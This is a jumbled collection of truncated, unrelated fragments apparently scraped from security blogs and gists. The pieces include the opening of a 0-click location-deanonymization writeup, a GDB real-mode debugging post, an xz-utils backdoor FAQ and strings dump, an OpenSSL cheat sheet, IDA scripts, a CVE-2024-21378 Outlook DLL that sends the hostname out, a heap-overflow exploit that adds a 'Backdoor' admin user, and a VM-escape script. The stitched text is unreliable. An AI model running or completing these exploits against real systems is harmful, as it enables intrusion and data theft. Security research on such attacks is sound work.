infernalheaven

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

The only proper way to debug 16-bit code on Qemu+GDB

(or nearly so...)

GDB is undeniably an extremely versatile debugger, with the ability to add breakpoints, watchpoints, dump memory, registers, and the source code (along with its corresponding assembly). These features make it the perfect Swiss Army knife for most programmers. In addition to that, the possibility of implementing a 'GDB Stub' and automatically supporting GDB in your application makes it an almost universal debugger for a variety of tasks.

Qemu, like other virtual machines (such as 86Box), also implements debugging via GDB Stub, which enormously facilitates the development of bootloaders, operating systems, and more. The support for 32-bit and 64-bit code is quite good, and I have never seen any complaints about it. However, for 16-bit/real mode...

Is debugging in 16-bit/real mode really that bad?

If you have ever tried to debug 16-bit code on Qemu, you know how painful it can be:

GDB thinks your code is

FAQ on the xz-utils backdoor

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for

#OpenSSL cheat sheet This is a brief howto for socket programmers.

create RSA key pairs

ex: 1024bits length key pair:

$> openssl genrsa -out myprivate.pem 1024
$> openssl rsa -in myprivate.pem -pubout -out mypublic.pem

	// based on https://gist.github.com/hax0kartik/e358ce447a4537bcef534aa8de84817c
	#include <idc.idc>

	static FuncDump(f, start)
	{
	auto ea, str, teststr;

	ea = start;

	while( ea != BADADDR )

	#include <idc.idc>

	static FuncDump(f, start)
	{
	auto ea, str, count, ref;
	auto end;
	auto teststr;

	ea = start;

	/**
	* This DLL is designed for use in conjunction with the Ruler tool for
	* security testing related to the CVE-2024-21378 vulnerability,
	* specifically targeting MS Outlook.
	*
	* It can be used with the following command line syntax:
	* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
	* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
	*
	* After being loaded into MS Outlook, it sends the PC's hostname and

	0810 b' from '
	0678 b' ssh2'
	00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
	0708 b'%s'
	0108 b'/usr/sbin/sshd\x00'
	0870 b'Accepted password for '
	01a0 b'Accepted publickey for '
	0c40 b'BN_bin2bn\x00'
	06d0 b'BN_bn2bin\x00'
	0958 b'BN_dup\x00'

	import socket, struct, sys
	p32 = lambda x: struct.pack(">I", x)
	p16 = lambda x: struct.pack(">h", x)
	p8 = lambda x: struct.pack(">b", x)

	# ASMP heap overflow exploit creates new applianceAdmin user
	def exploit(hostname, username="Backdoor", password="Backdoor"):
	global socks # python closes out of scope sockets
	port = 3211 # port is hardcoded in the binary
	usernm = username.encode()

	#!/usr/bin/env python
	# https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl

	import sys
	import time
	import getopt
	import socket

	'''
	Gives the hexadecimal representation of "command"